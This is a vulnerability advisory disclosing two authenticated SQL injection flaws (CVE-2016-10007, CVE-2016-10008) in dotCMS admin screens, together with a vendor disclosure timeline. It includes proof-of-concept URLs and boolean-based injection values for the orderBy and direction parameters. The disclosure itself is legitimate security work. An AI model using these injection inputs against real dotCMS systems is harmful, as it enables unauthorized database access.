dotCMS SQL Injection

`Title: Multiple SQL injection vulnerabilities in dotCMS (2x CVE)  
Credit: Elar Lang / https://security.elarlang.eu  
Vendor/Product: dotCMS (http://dotcms.com/)  
Vulnerability: SQL injection  
Vulnerable version: before 4.1.1. Theoretically would be fixed in  
3.7.2 (not released yet)  
CVE: CVE-2016-10007, CVE-2016-10008  
  
  
# Multiple SQL injections in dotCMS framework.  
  
I had already reported 8 SQL injection vulnerabilities to dotCMS and I  
was curious as to how they fixed it.  
With checking fixes I found 2 new vulnerabilites but for those I had  
to bypass blacklist defence.  
  
  
## CVE-2016-10007 - "Marketing" > Forms" page,  
_EXT_FORM_HANDLER_orderBy parameter  
  
An SQL injection vulnerability in the "Marketing > Forms" screen in  
dotCMS before 3.7.2 (not released) and 4.1.1 allows remote  
authenticated attackers to execute arbitrary SQL commands via the  
_EXT_FORM_HANDLER_orderBy parameter.  
  
Preconditions: the attacker must be authenticated and authorized as an  
administrator.  
  
Proof-of-Concept URL (from "Admin Site" UI: "Marketing > Forms", click  
on some column title in the resultset table):  
/c/portal/layout?p_l_id=89594b95-1354-4a63-8867-c922880107df&p_p_id=EXT_FORM_HANDLER&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_FORM_HANDLER_struts_action=%2Fext%2Fformhandler%2Fview_form&_EXT_FORM_HANDLER_orderBy=SQLi&_EXT_FORM_HANDLER_direction=asc  
  
Proof-of-Concept values for parameter _EXT_FORM_HANDLER_orderBy.  
Precondition for this example: there must be at least 2 different rows  
in the resultset and ordering by name and description field should  
give different ordering (if they don't, use some other field names)  
  
-- boolean true - output is ordered by name field  
_EXT_FORM_HANDLER_orderBy=case when 1=1 then name else description end  
  
-- boolean false - output is ordered by descriotion field  
_EXT_FORM_HANDLER_orderBy=case when 1=0 then name else description end  
  
  
  
## CVE-2016-10008 - "Content Types > Content Types" page,  
_EXT_STRUCTURE_direction parameter  
  
An SQL injection vulnerability in the "Content Types > Content Types"  
screen in dotCMS before 3.7.2 (not released) and 4.1.1 allows remote  
authenticated attackers to execute arbitrary SQL commands via the  
_EXT_STRUCTURE_direction parameter parameter.  
  
Preconditions: the attacker must be authenticated and authorized as an  
administrator.  
  
Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content  
Types", click on some column title in the resultset table):  
demo.dotcms.com/c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=velocity_var_name&_EXT_STRUCTURE_direction=SQLi  
  
  
# Vulnerability Disclosure Timeline  
  
2016-10-24 | me > dotCMS | SQLi Poc  
2016-10-25 | dotCMS > me | Thanks for PoC  
  
2016-12-19 | me > dotCMS | Informed CVE numbers, asked status for  
reported issues.  
2016-12-19 | dotCMS > me | Low priority, not planning fixing in next release  
2016-12-19 | me > dotCMS | agreed with low priority (requires  
authenticated user in administrator privileges)  
  
2017-03-03 | me > dotCMS | I can see many new releases, is it fixed? [2]  
2017-03-06 | dotCMS > me | No. Probably will be not addressed until  
the project to refactor our admin interface is completed.  
  
2017-06-16 | dotCMS | dotCMS version 4.1.1 release  
  
2017-07-18 | me > dotCMS | As I need to publich CVEs at some point,  
what is the status?  
2017-07-21 | dotCMS > me | Fixes are available on 4.1.1. Would it be  
possible to wait 3 to 4 weeks so we can release 3.7.2?  
  
2017-10-10 | me > dotCMS | "3 to 4 weeks" passed, how it is going with 3.7.2?  
2017-10-17 | dotCMS > me | "Thank you for your patience! Thank you for  
your email! It prompted me to push the developer to finish getting  
this release out the door. I will email you next week with an update."  
  
This "next week" never arrived ;)  
  
2018-02-11 | me | Full Disclosure on http://security.elarlang.eu  
  
  
# Related fixes and releases  
https://dotcms.com/docs/latest/change-log#release-4.1.1  
  
# More detailed (inc some code review and blacklist bypass)  
description is available in blog:  
https://security.elarlang.eu/cve-2016-10007-and-cve-2016-10008-2-sql-injection-vulnerabilities-in-dotcms-blacklist-defence-bypass.html  
  
--  
Elar Lang  
Blog @ https://security.elarlang.eu  
Pentester, lecturer @ http://www.clarifiedsecurity.com  
  
  
`